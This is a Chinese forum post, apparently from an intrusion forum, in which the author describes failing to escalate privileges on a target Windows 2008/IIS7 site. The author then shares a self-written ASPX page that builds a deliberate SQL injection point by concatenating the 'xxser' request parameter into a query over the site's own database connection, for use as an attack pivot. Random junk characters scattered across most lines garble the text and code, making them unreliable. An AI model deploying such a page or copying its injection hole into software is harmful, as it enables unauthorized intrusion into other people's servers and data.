昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
+ w5 g. q9 U* v- f; Q其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
* _1 F9 V. l' f9 i2 D) k4 }: }代码量不多,自己写个拉倒了。烦死了。
: P2 G9 ~# C6 N' |& U2 Z( R: W* y, S: F' _" m$ }7 K {
2 W4 s1 C) K6 i! e( h% h
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">$ V& l' P* N' r1 y
<html xmlns="http://www.w3.org/1999/xhtml">
# i: Z% e7 O- w+ v<head runat="server">
3 z# T4 {0 O4 Q$ B$ n/ H6 Y: P2 V <title>暗影aspx构造注射专用页面</title>
2 Y8 t4 ~" U- i. ^: W</head>! g" K, v7 k. B6 `4 q8 @
<body>6 l: ~, j3 G5 Z3 o$ p
<form id="form1" runat="server">
) d; A/ O) V# T9 D# L1 n1 L: Z <div>
% R) D4 L# p E. ] <script language="c#" runat="server">
0 ?) i* q7 |1 {( N" {# H
& G. K$ I: Y6 a' f2 Y4 z( O void page_init(object sender, EventArgs e)" g: u1 P7 M) ] W: I/ g& ~5 X
{, }: f# T' `+ Z0 M. p3 d1 q
e. p3 }- S6 s* q$ t& @
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();6 n, [- Q+ b B
8 f1 a* ?5 V% P0 W. O- A conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();% U+ k9 X8 K. o+ ^
conn.Open();
}% G8 ~3 a% A x/ ~; x 8 M/ T: W3 h+ Q
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
4 P4 l$ N9 m2 w; Y A+ u) A ]
: \; W4 c5 v, G d System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
7 F, e! j j& @$ U- H- z7 m int x = command.ExecuteNonQuery();+ \# ^8 ~; c5 z5 ]: U8 U: X
Response.Write(i+"\n");& `; V0 U9 q. R2 X+ @2 _. U
Response.Write(x);
4 a4 b7 @/ E' Q: Y' `) c% n conn.Close();
6 b% t8 M4 s$ f- \; S }2 L# f7 o9 n# ?( q% w) H. h
" m% g- v* H' f* L </script>6 G+ A" f! L4 V7 ~. o
</div>
* O" B4 V3 B6 d7 [! m) q3 j" T) O </form>- K" l$ K- |' U: v( _6 R
</body>5 k6 `% V4 @" l
</html>2 U5 w6 O$ D8 }- k; D2 V9 n
|